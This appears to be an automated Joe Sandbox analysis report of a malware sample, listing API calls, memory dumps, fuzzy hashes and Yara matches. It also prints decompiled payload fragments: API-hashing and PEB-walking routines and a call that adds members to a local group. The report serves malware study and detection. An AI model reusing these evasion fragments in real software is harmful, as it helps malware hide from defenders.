                                                                      • Part of subcall function 02D1F56D: LookupAccountSidW.ADVAPI32(00000000,02D1D471,?,00000104,?,00000010,?), ref: 02D1F5E7
                                                                      • Part of subcall function 02D1F56D: GetLastError.KERNEL32(?,?,00000001), ref: 02D1F5F1
                                                                      • Part of subcall function 02D1F56D: FreeSid.ADVAPI32(02D1D471,?,?,00000001), ref: 02D1F5FF
                                                                    • NetLocalGroupAddMembers.NETAPI32(00000000,00000000,00000003,00010201,00000001,?,?,?,02D1E634,02E5E07C,02E5E080), ref: 02D1D47B
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Free$AccountAllocateErrorGroupInitializeLastLocalLookupMembersUserVirtual
                                                                    • String ID:
                                                                    • API String ID: 188019324-0
                                                                    • Opcode ID: 316d60de3d65a92ac2477cc438c7e9248bbbbbbfed5e882039b05f5b8534580b
                                                                    • Instruction ID: 8ca713ae66633df381b5991e1307d47e8e6b02fda2bfbb74435da1e86e5b2937
                                                                    • Opcode Fuzzy Hash: 316d60de3d65a92ac2477cc438c7e9248bbbbbbfed5e882039b05f5b8534580b
                                                                    • Instruction Fuzzy Hash: 64112472D00208AFDB15DFAAD8849EEB7F9FF59314B01442AE951EB310D774AA44CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • FindFirstFileExA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0040FE93
                                                                    • FindClose.KERNEL32(00000000), ref: 0040FEBA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID:
                                                                    • API String ID: 2295610775-0
                                                                    • Opcode ID: 80f6f941a0db3b3c0c45d739bb512864b40ffff435a06e77faa97da734ecc396
                                                                    • Instruction ID: 038a8fb61cb237d230c685133694ded75d8cc414ee41c0c90b25892bffa1d6a0
                                                                    • Opcode Fuzzy Hash: 80f6f941a0db3b3c0c45d739bb512864b40ffff435a06e77faa97da734ecc396
                                                                    • Instruction Fuzzy Hash: 7701DB719010186ED7106A64DC819FF735DC70536CF0006FAF959E32D1E5385D454AE5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: U)A$U)A
                                                                    • API String ID: 0-2836072118
                                                                    • Opcode ID: 65b73f715693850ffec0fc9f25c396ad5906813cce7ddb7c1ddb68e31c867604
                                                                    • Instruction ID: add6174ef3477d1951e88cee4c9d6ab8e256457dd076e31f4fdc4ddeda1ec703
                                                                    • Opcode Fuzzy Hash: 65b73f715693850ffec0fc9f25c396ad5906813cce7ddb7c1ddb68e31c867604
                                                                    • Instruction Fuzzy Hash: B411E723F308395B374CC52E8C9337962D1EBDC600346423EE96AD62C0E464DA23E2D4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00416D1E,?,?,00000008,?,?,004169B1,00000000), ref: 00416F50
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionRaise
                                                                    • String ID:
                                                                    • API String ID: 3997070919-0
                                                                    • Opcode ID: d37f48bf4c3e104909b4e4161337008c83684517693bacd8f5afcc66329dcbcb
                                                                    • Instruction ID: 1589389d28c73f91bf6cfb513a086a80f1ee3063716408060e62e229d31821a5
                                                                    • Opcode Fuzzy Hash: d37f48bf4c3e104909b4e4161337008c83684517693bacd8f5afcc66329dcbcb
                                                                    • Instruction Fuzzy Hash: F9B15D362106089FD715CF28C486BA57BE1FF45364F26869DE899CF3A1C339E992CB44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040803A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: FeaturePresentProcessor
                                                                    • String ID:
                                                                    • API String ID: 2325560087-0
                                                                    • Opcode ID: 8168f5c29d9b1f5dce2771a64f4dcb4d6f43813f93988e61cec66a89e2683f9e
                                                                    • Instruction ID: 08c22f77be665deab516b6a6e8d73e9c4e9ea2b3d0bc0547e2a5e203cb54158c
                                                                    • Opcode Fuzzy Hash: 8168f5c29d9b1f5dce2771a64f4dcb4d6f43813f93988e61cec66a89e2683f9e
                                                                    • Instruction Fuzzy Hash: 6751BDB5A01604CBEB58CF58D9857AABBF0FB98318F10842FD441EB392E7389D05DB58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0
                                                                    • API String ID: 0-4108050209
                                                                    • Opcode ID: dd0aa1ed614b0a8bf40b50611dad1ec735aff16f5d9d4b7c4f468f230bbb6051
                                                                    • Instruction ID: 38feb7ee74db4475ab10e88f9d0da7e86747e0a79f500ce1299db44615ec6a64
                                                                    • Opcode Fuzzy Hash: dd0aa1ed614b0a8bf40b50611dad1ec735aff16f5d9d4b7c4f468f230bbb6051
                                                                    • Instruction Fuzzy Hash: 795147A260460456DB38A5288895BBF639DDB81340F18893FD582F77E2D73C9D4683DE
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: HeapProcess
                                                                    • String ID:
                                                                    • API String ID: 54951025-0
                                                                    • Opcode ID: 7f0e7b7f72212444e52f522e2596f7418f22051d3498ac3a7c83494b137dfa1d
                                                                    • Instruction ID: 3ad25e0c3389eea5711c06c8053541f1debe4971f541d826d3fd0608d163c454
                                                                    • Opcode Fuzzy Hash: 7f0e7b7f72212444e52f522e2596f7418f22051d3498ac3a7c83494b137dfa1d
                                                                    • Instruction Fuzzy Hash: 1BA01130A022028BA3808F32AA083883BA8AA8228030080A8A00AC0820EB308020AA80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cad1d90d14a7126ab0fa1995cc60725156ce9321df5267fbf48d907fe4971930
                                                                    • Instruction ID: 9931ee56fa8938d02c7a940b8cca2a765a21c3ee499369bbd0ded42e1317bef0
                                                                    • Opcode Fuzzy Hash: cad1d90d14a7126ab0fa1995cc60725156ce9321df5267fbf48d907fe4971930
                                                                    • Instruction Fuzzy Hash: BF21A473F2053847770CC47E8C562BDB6E1C68C501745827AE9A6DA2C1E968D927E2E4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 83%
                                                                    			E02D21BF8(void* __ecx, signed int __edx, signed int _a4, signed int* _a8) {
                                                                    				void* _t13;
                                                                    				signed int* _t25;
                                                                    				void* _t26;
                                                                    				signed int _t33;
                                                                    				signed int _t35;
                                                                    				signed int _t42;
                                                                    				signed int _t43;
                                                                    				signed int _t48;
                                                                    				signed int _t49;
                                                                    				signed char* _t52;
                                                                    
                                                                    				_t33 = __edx;
                                                                    				asm("cdq");
                                                                    				_t42 = __edx & 0x00000003;
                                                                    				_t43 = _a4;
                                                                    				_t48 = _t42 + __edx >> 2;
                                                                    				_t52 = __ecx + _t48 * 4;
                                                                    				_t49 =  ~_t48;
                                                                    				if(_t42 != 0) {
                                                                    					do {
                                                                    						asm("rol eax, 0xf");
                                                                    						asm("rol eax, 0xd");
                                                                    						_t43 = ( *(_t52 + _t49 * 4) * 0xcc9e2d51 * 0x1b873593 ^ _t43) * 5 - 0x19ab949c;
                                                                    						_t49 = _t49 + 1;
                                                                    					} while (_t49 != 0);
                                                                    				}
                                                                    				_t35 = 0;
                                                                    				_t13 = (_t33 & 0x00000003) - 1;
                                                                    				if(_t13 == 0) {
                                                                    					L7:
                                                                    					asm("rol eax, 0xf");
                                                                    					_t43 = _t43 ^ ( *_t52 & 0x000000ff ^ _t35) * 0xcc9e2d51 * 0x1b873593;
                                                                    				} else {
                                                                    					_t26 = _t13 - 1;
                                                                    					if(_t26 == 0) {
                                                                    						L6:
                                                                    						_t35 = _t35 ^ (_t52[1] & 0x000000ff) << 0x00000008;
                                                                    						goto L7;
                                                                    					} else {
                                                                    						if(_t26 == 1) {
                                                                    							_t35 = (_t52[2] & 0x000000ff) << 0x10;
                                                                    							goto L6;
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				_t25 = _a8;
                                                                    				 *_t25 = (((_t43 ^ _t33) >> 0x00000010 ^ _t43 ^ _t33) * 0x85ebca6b >> 0x0000000d ^ ((_t43 ^ _t33) >> 0x00000010 ^ _t43 ^ _t33) * 0x85ebca6b) * 0xc2b2ae35 >> 0x00000010 ^ (((_t43 ^ _t33) >> 0x00000010 ^ _t43 ^ _t33) * 0x85ebca6b >> 0x0000000d ^ ((_t43 ^ _t33) >> 0x00000010 ^ _t43 ^ _t33) * 0x85ebca6b) * 0xc2b2ae35;
                                                                    				return _t25;
                                                                    			}

                                                                    Instruction addresses: 0x02d21bfc, 0x02d21c00, 0x02d21c01, 0x02d21c09, 0x02d21c0c, 0x02d21c0f, 0x02d21c12, 0x02d21c14, 0x02d21c16, 0x02d21c1d, 0x02d21c28, 0x02d21c2e, 0x02d21c34, 0x02d21c34, 0x02d21c16, 0x02d21c3b, 0x02d21c40, 0x02d21c43, 0x02d21c5f, 0x02d21c6a, 0x02d21c73, 0x02d21c45, 0x02d21c45, 0x02d21c48, 0x02d21c56, 0x02d21c5d, 0x00000000, 0x02d21c4a, 0x02d21c4d, 0x02d21c53, 0x00000000, 0x02d21c53, 0x02d21c4d, 0x02d21c48, 0x02d21c9b, 0x02d21c9e, 0x02d21ca1

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ee9a03c5baf9720a6e7d8e5d675cdaadf48f2bf7d7bc5066cbb6e6d82dfa4c0b
                                                                    • Instruction ID: 5248974946718da3f0d3a2f5d43c24974c26924d13b39cddf1d48e165d4431aa
                                                                    • Opcode Fuzzy Hash: ee9a03c5baf9720a6e7d8e5d675cdaadf48f2bf7d7bc5066cbb6e6d82dfa4c0b
                                                                    • Instruction Fuzzy Hash: D81148323505210A872C9C3E4D57067FBCBD3C9014748D53EE99FCB352E531E70A9680
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 72f9bda1e34f90da71cd9cf11ecf6e4695a8bf6c74432d80b894c9ec6b43e2a8
                                                                    • Instruction ID: f40bb324475060c3110c6da8a23151635de457e1c8f8d9b65f1d3824af98e468
                                                                    • Opcode Fuzzy Hash: 72f9bda1e34f90da71cd9cf11ecf6e4695a8bf6c74432d80b894c9ec6b43e2a8
                                                                    • Instruction Fuzzy Hash: 74E0D632956228EBC720CAC8D80088AF3BCEB08B00B0000BBB804E3600C234EE00CBC0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E02D20620() {
                                                                    				intOrPtr* _t10;
                                                                    				intOrPtr* _t11;
                                                                    
                                                                    				_t10 =  *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x14;
                                                                    				_t11 =  *_t10;
                                                                    				while(_t11 != _t10) {
                                                                    					if(E02D206DE( *((intOrPtr*)(_t11 + 0x28))) == 0) {
                                                                    						return  *((intOrPtr*)(_t11 + 0x10));
                                                                    					}
                                                                    					_t11 =  *_t11;
                                                                    				}
                                                                    				return 0;
                                                                    			}

                                                                    Instruction addresses: 0x02d2062b, 0x02d2062e, 0x02d20640, 0x02d2063c, 0x00000000, 0x02d20649, 0x02d2063e, 0x02d2063e, 0x00000000

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
                                                                    • Instruction ID: 966b6e3e293aa16d75bb7db1b991373ae5be56495f330734d171842cfc5b454f
                                                                    • Opcode Fuzzy Hash: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
                                                                    • Instruction Fuzzy Hash: E7E08C322005B0CBC630DB1AD440B12B3B5EBF067BB1A0468E48AA3700C320FC09CAA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E02D2094E() {
                                                                    				intOrPtr _t4;
                                                                    
                                                                    				_t4 =  *[fs:0x30];
                                                                    				if(_t4 == 0) {
                                                                    					return 0;
                                                                    				} else {
                                                                    					return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t4 + 0xc)) + 0xc)))))) + 0x18));
                                                                    				}
                                                                    			}

                                                                    Instruction addresses: 0x02d2094e, 0x02d20956, 0x02d20968, 0x02d20958, 0x02d20965, 0x02d20965

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
                                                                    • Instruction ID: bf8c6c44afdc0168db363bb7797cc370ca9937b5e5e89a27914988d421ddb04d
                                                                    • Opcode Fuzzy Hash: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
                                                                    • Instruction Fuzzy Hash: D7D0EA383619408FDB51CF18C684E01B3E4EB69A65B098491E90ADB735D734ED00EA00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E02D20619() {
                                                                    
                                                                    				return  *[fs:0x30];
                                                                    			}

                                                                    Instruction addresses: 0x02d2061f

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                    • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                    • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                    • Instruction Fuzzy Hash:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 00406730: GetCommandLineA.KERNEL32(004068C0,?), ref: 00406730
                                                                      • Part of subcall function 00406730: CoInitialize.OLE32(00000000), ref: 00406738
                                                                    • IsWindowVisible.USER32(?), ref: 0040693D
                                                                    • ShowWindow.USER32(?,00000001), ref: 00406951
                                                                    • GetDlgItem.USER32(?,000000D0), ref: 0040696A
                                                                    • SendMessageA.USER32(00000000,00000180,00000000,?), ref: 00406978
                                                                    • GetDlgItem.USER32(?,000000D1), ref: 0040699C
                                                                    • EnableWindow.USER32(00000000,00000001), ref: 004069A7
                                                                    • GetDlgItem.USER32(?,000000D3), ref: 004069B6
                                                                    • EnableWindow.USER32(00000000,00000001), ref: 004069BB
                                                                    • GetDlgItem.USER32(?,000000D2), ref: 004069CA
                                                                    • EnableWindow.USER32(00000000,00000001), ref: 004069CF
                                                                    • GetDlgItem.USER32(?,000000D4), ref: 004069DE
                                                                    • EnableWindow.USER32(00000000,00000001), ref: 004069E3
                                                                    • GetDlgItem.USER32(?,00000001), ref: 004069EF
                                                                    • EnableWindow.USER32(00000000,00000000), ref: 004069F4
                                                                      • Part of subcall function 00403AE0: GetLastError.KERNEL32(0040136F,0041FB28,0040136F,?,0040136F,80070216,00000000), ref: 00403B00
                                                                    • GetDlgItem.USER32(?,000000D0), ref: 00406A74
                                                                    • SendMessageA.USER32(00000000,0000018F,000000FF,?), ref: 00406A8E
                                                                    • SendMessageA.USER32(00000000,00000189,00000000,?), ref: 00406AA6
                                                                    • SendMessageA.USER32(00000000,00000182,00000000,00000000), ref: 00406AB1
                                                                      • Part of subcall function 00406DE0: GetDlgItem.USER32(?,000000D0), ref: 00406E00
                                                                      • Part of subcall function 00406DE0: 73CCAC50.USER32(00000000), ref: 00406E11
                                                                      • Part of subcall function 00406DE0: GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 00406E39
                                                                      • Part of subcall function 00406DE0: SendMessageA.USER32(00000000,00000194,?,00000000), ref: 00406EE1
                                                                    • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 00406ACE
                                                                    • GetDlgItem.USER32(?,000000D1), ref: 00406AF0
                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00406AFB
                                                                    • GetDlgItem.USER32(?,000000D3), ref: 00406B0A
                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00406B0F
                                                                    • GetDlgItem.USER32(?,000000D2), ref: 00406B1E
                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00406B23
                                                                    • GetDlgItem.USER32(?,000000D4), ref: 00406B32
                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00406B37
                                                                    • GetDlgItem.USER32(?,00000001), ref: 00406B43
                                                                    • EnableWindow.USER32(00000000,00000001), ref: 00406B48
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: Item$Window$Enable$MessageSend$CommandErrorExtentInitializeLastLinePoint32ShowTextVisible
                                                                    • String ID: Cookie %9d.$Cookie %9d.(pUnk = %p)
                                                                    • API String ID: 3625087784-2754364986
                                                                    • Opcode ID: d5f630e425a98e50dfa06e2096088c813359cdf5ba056af25791d08efade4967
                                                                    • Instruction ID: 6ede75db96ccff61ba40a2ed4a33d96549853e1cc4968c3f54cc6da287572702
